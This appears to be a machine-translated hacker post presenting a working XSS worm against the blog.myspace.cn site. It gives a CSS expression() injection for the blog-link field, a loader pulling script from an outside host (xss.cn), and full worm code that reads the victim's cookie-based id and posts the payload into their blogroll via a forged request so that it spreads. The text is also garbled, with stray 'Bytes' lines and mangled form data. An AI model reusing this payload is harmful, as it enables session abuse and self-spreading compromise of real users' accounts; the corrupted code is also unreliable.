Myspace ajax worm

: Www. ood. name
Target URL: http://blog.myspace.cn/
In links-> management, you can add Js to the URL, for example:

Http://x.cn "style =" windth: expression (if (window. x! = 1) {alert (document. cookie); window. x = 1 ;})

If you want to add an external Js, there are many methods, but the document. write will make the page blank, leaving only our Js. therefore, to add js instead of rewrite js, you need to use the following method:

<Script> h = document. createElement ('script'); h. src = 'HTTP: // xss.cn '; k = document. getElementsByTagName ('head') [0]; k. appendChild (h); </script>

Note that the http://xss.cn, because of the limited characters entered in the URL, so this URL is very short, the complete code is:

Http://x.cn "style =" windth: expression (if (window. x! = 1) {eval (unescape ('H % 3Ddocument. createElement % 28% 27 script % 27% 29% 3Bh. src % 3D % 27 http % 3A // xss.cn % 27% 3Bk % 3Ddocument. getElementsByTagName % 28% 27 head % 27% 29% 5B0% 5D % 3Bk. appendChild % 28 h % 29% 3B '); window. x = 1 })

Note: Do not check the line feed option when copying this code.
The following is the complete code. I have not modified the mosaic: P

Var id = id ();
Var check = check ();
Function createAjax ()
{
Var xmlhttp;
Try {
Xmlhttp = new ActiveXObject ("Microsoft. XMLHTTP ");
}
Catch (e ){
Try {
Xmlhttp = new XMLHttpRequest ();
}
Catch (e ){
Xmlhttp = false;
}
}
Return xmlhttp;
}
Function check ()
{
Varurl = "http://blog.myspace.cn/" + id;
Var xmlhttp = createAjax ();
Xmlhttp. open ('get', url, false );
Xmlhttp. send ();
Var page = xmlhttp. responseText;
Var check = page. indexOf ("x.cn ");
Return check;
}
Function id ()
{
Var cookie = document. cookie;
Var cook = cookie. split (";");
Var x = cookie. indexOf ("ShutterUser = ");
Var y = cookie. indexOf ("false ");
Var id = cookie. substring (x + 12, Y-1 );
Return id;
}
Function postdata ()
{
If (check =-1 ){
Var xmlhttp = createAjax ();
If (xmlhttp ){
Var useragent = navigator. userAgent;
Var url = "http://blog.myspace.cn/" + id + "/Admin/PageV3/BlogRollMgmt. aspx ";
Var data = "_ EVENTTARGET = ctl00 % 24 Main % 24UC_BlogRollMgmt % 24 AddLink & __ EVENTARGUMENT = & __ VIEWSTATE = % response % 2BL5oOF6ZO % response % 2Bm % response

Bytes

TvvIzlubbkuJTljIXmi6zmnInlqLHkuZDmmI7mmJ % messages

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

UhaQlmNg % 3D & ctl00 % 24 Main % 24UC_BlogRollMgmt % 24 AddLinkTitleInput = baidu & ctl00 % 24 Main % Alibaba % 24 AddLinkUrlInput = http % 3A % 2F % 2Fx.cn % 22 + style % 3D % 22 windth % 3 Aexpression % 28if % 28window. x % 21% 3D1% 29% 7 Beval % 28 unescape % 28% 27 h % 253Ddocument. createElement % 2528% 2527 script % 2527% 2529% 253Bh. src % 253D % 2527 http % 253A % 2F % 2Fxss.cn % 2527% 253Bk % 253Ddocument. getElementsByTagName % 2528% 2527 head % 2527% 2529% 255B0% 255D % 253Bk. appendChild % 2528 h % 2529% 253B % 27% 29% 3Bwindow. x % 3D1% 7D % 29"
Xmlhttp. open ("post", url, true );
Xmlhttp. setRequestHeader ("Accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/msword, application/x-silverlight, application/vnd. ms-powerpoint ,*/*");
Xmlhttp. setRequestHeader ("Referer", url );
Xmlhttp. setRequestHeader ("Accept-Language", "zh-cn ");
Xmlhttp. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ");
Xmlhttp. setRequestHeader ("Accept-Encoding", "gzip, deflate ");
Xmlhttp. setRequestHeader ("User-Agent", useragent );
Xmlhttp. setRequestHeader ("Host", "blog.myspace.cn ");
Xmlhttp. setRequestHeader ("Content-Length", data. length );
Xmlhttp. setRequestHeader ("Connection", "Keep-Alive ");
Xmlhttp. setRequestHeader ("Cache-Control", "no-cache ");
Xmlhttp. onreadystatechange = function (){
If (xmlhttp. readyState = 4 & xmlhttp. status = 200 ){
}
}
Xmlhttp. send (data );
}
}
Else {}
}
Postdata ();